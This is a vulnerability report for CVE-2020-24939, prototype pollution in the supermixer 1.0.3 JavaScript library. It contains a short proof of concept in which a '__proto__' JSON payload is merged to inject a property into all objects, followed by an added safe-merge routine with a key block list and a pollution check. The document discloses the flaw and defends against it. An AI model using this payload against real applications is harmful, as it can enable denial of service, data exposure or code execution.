CVE-2020-24939: Prototype pollution · Issue #9 · stampit-org/supermixer

Prototype pollution in Stampit supermixer 1.0.3 allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.


I would like to report a prototype pollution in supermixer. It allows an attacker to modify the prototype of a base object, which can vary in severity depending on the implementation.

Vulnerability Description:

Prototype Pollution is a vulnerability affecting JavaScript. It refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects.

Proof of Concept:

var mixer = require('supermixer');
// Attacker-controlled JSON: JSON.parse turns "__proto__" into an own key of the parsed object
var payload = '{"__proto__":{"poc":"evil"}}';
var test = {};
console.log("Before: ", test.poc);     // unrelated empty object, property not yet present
mixer.merge({}, JSON.parse(payload));  // the merge assigns through the "__proto__" key
console.log("After: ", test.poc);      // the injected property is now visible on every object

Impact:

DoS, Access to restricted data, RCE (depends on implementation)
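The fix a merge routine needs against the payload shape above is to refuse the keys that reach Object.prototype and to write only through own properties. The following is an added example, not supermixer's code or the reporter's; `safeMerge`, `prototypeIsPolluted` and the payload are constructed here for illustration.

```javascript
// Added example (not supermixer's code): a recursive merge that skips the keys an
// attacker uses to reach Object.prototype, plus a check that a merge left the
// global prototype untouched. All inputs below are constructed.

const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(value) {
  return value !== null && typeof value === 'object' && !Array.isArray(value);
}

// Deep-merge `source` into `target`, ignoring keys that could rewrite a prototype.
// Only own, enumerable keys of the source are visited (JSON.parse makes "__proto__"
// an own key, so it shows up here and is dropped), and nested objects are written
// into a fresh plain object unless target already owns a plain object at that key.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const ownExisting =
        Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key])
          ? target[key]
          : {};
      target[key] = safeMerge(ownExisting, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Detection helper: report whether any of the given names now leak from
// Object.prototype into a brand-new empty object.
function prototypeIsPolluted(names) {
  const probe = {};
  return names.some((name) => name in probe);
}

// Constructed payload in the shape used in the report above, with one benign key.
const payload = '{"__proto__":{"poc":"evil"},"ok":{"a":1}}';

function demo() {
  const merged = safeMerge({}, JSON.parse(payload));
  return { merged, polluted: prototypeIsPolluted(['poc']) };
}
```

Running `demo()` keeps the benign `ok` subtree and leaves `({}).poc` undefined, which is the property the report's proof of concept reads after the vulnerable merge.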
